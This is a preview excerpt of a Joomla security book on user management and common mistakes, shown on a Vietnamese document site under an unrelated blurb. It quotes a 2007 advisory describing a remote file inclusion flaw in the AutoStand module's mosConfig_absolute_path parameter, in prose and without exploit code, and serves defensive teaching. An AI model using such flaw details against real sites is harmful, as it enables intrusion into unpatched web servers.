tailieunhanh - Bảo mật cho joomla part 3
Kiểm tra nhân viên security-you/your vật lý của bạn: bao nhiêu "thông tin" làm bạn bị rò rỉ? Tác giả sử dụng thuật ngữ "cà phê-nhà" quy tắc để mô tả một phương pháp giao tiếp trong công chúng. | This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave. Topeka 66604 Chapter 1 User Management When you set up your site there are several different methods to manage users and their permissions. The permutations are numerous and I would suggest you to pick up a copy of Barrie North s book The Joomla Admin Manual A Step by Step Guide to a Successful Website Or Joomla A User s Guide You can find both of these at or Later we are going to learn about tools to help you post-install. However if you have taken these steps you are doing very well indeed. Common Trip Ups While an entire volume could be filled with common mistakes we ll focus on a few of them here. They are presented here in no particular order. Failure to Check Vulnerability List First One big problem comes in if you are using a component that is vulnerable. To start with why would we deliberately set up our site to be broken into A quick review of the current vulnerability list shows at the time of writing of over sixty known vulnerable extensions. Here is one chosen at random known as AutoStand. I followed the link listed in Joomla and found the security site FrSIRT. They list this as a critical exploit. Advisory ID FrSIRT ADV-2007-1392 CVE ID CVE-2007-2319 Rated as High Risk Remotely Exploitable Yes Locally Exploitable Yes Release Date 2007-04-16 A vulnerability has been identified in AutoStand module for Joomla which could be exploited by remote attackers to execute arbitrary commands. This issue is caused by an input validation error in the script that does not validate the mosConfig_absolute_path parameter which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server. 27 This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave. Topeka 66604 packt L .
đang nạp các trang xem trước